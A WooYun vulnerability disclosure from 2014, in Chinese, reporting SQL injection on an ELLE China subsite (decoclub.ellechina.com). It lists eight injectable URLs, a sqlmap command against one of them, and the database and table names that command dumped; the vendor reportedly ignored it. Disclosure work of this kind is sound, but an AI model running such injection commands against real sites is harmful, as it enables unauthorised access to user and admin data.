当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-050837

漏洞标题:ELLE中国某分站sql注入合集

相关厂商:ellechina.com

漏洞作者: 摸了你

提交时间:2014-02-13 15:05

修复时间:2014-02-23 15:06

公开时间:2014-02-23 15:06

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-02-13: 细节已通知厂商并且等待厂商处理中
2014-02-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

注入.

详细说明:

1、注入点

http://decoclub.ellechina.com/calendar_cont.php?calid=12 
http://decoclub.ellechina.com/detailopus.php?leftlogin=islogin&uid=34
http://decoclub.ellechina.com/detailopus_cont.php?id=66&uid=34
http://decoclub.ellechina.com/detailopus_msg.php?uid=34
http://decoclub.ellechina.com/detailopus_pic.php?uid=34
http://decoclub.ellechina.com/masterlarge.php?id=7
http://decoclub.ellechina.com/msg_act.php?uid=34
http://decoclub.ellechina.com/opuslist_cont.php?id=33/2


2、找一点测试

http://decoclub.ellechina.com/calendar_cont.php?calid=12 (GET)


sqlmap.py -u "http://decoclub.ellechina.com/calendar_cont.php?calid=12" --dbms "mysql" --dbs


Database

available databases [2]:
[*] information_schema
[*] vendor2


Tables

Database: vendor2
[55 tables]
+--------------------------------------+
| deco2013_admin |
| deco2013_user |
| deco2013_vote |
| ellechina_femina_admin |
| ellechina_femina_award |
| ellechina_femina_control |
| ellechina_femina_log |
| ellechina_femina_member |
| ellechina_femina_mode |
| ellechina_femina_msg |
| ellechina_femina_pointlog |
| ellechina_femina_staraward |
| ellechina_femina_vote |
| elleshop_admin |
| elleshop_end |
| elleshop_final |
| elleshop_player |
| elleshop_product |
| esa2011_admin |
| esa2011_player |
| esa2011_player_com |
| esa2011_player_vot |
| esa2011_user |
| good8_activity_decodesigner_admin |
| good8_activity_decodesigner_calendar |
| good8_activity_decodesigner_control |
| good8_activity_decodesigner_dsjt |
| good8_activity_decodesigner_dsjtcont |
| good8_activity_decodesigner_hjsign |
| good8_activity_decodesigner_ltype |
| good8_activity_decodesigner_member |
| good8_activity_decodesigner_minitype |
| good8_activity_decodesigner_mode |
| good8_activity_decodesigner_msg |
| good8_activity_decodesigner_uppic |
| good8_activity_decodesigner_vote |
| grandtour2011_admin |
| grandtour2011_model |
| grandtour2011_model_x_votes |
| grandtour2011_open_car |
| grandtour2011_users |
| huayi_admin |
| huayi_img_auction |
| huayi_p_auction |
| huayi_u_auction |
| huayi_userinfo |
| itgirl_admin |
| itgirl_control |
| itgirl_isopen |
| itgirl_liuyan |
| itgirl_player |
| itgirl_subject |
| itgirl_user |
| itgirl_vote |
| itgirl_zone |
+--------------------------------------+

漏洞证明:

...看详细

修复方案:

过滤~

版权声明:转载请注明来源 摸了你@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-02-23 15:06

厂商回复:

最新状态:

暂无


漏洞评价:

评论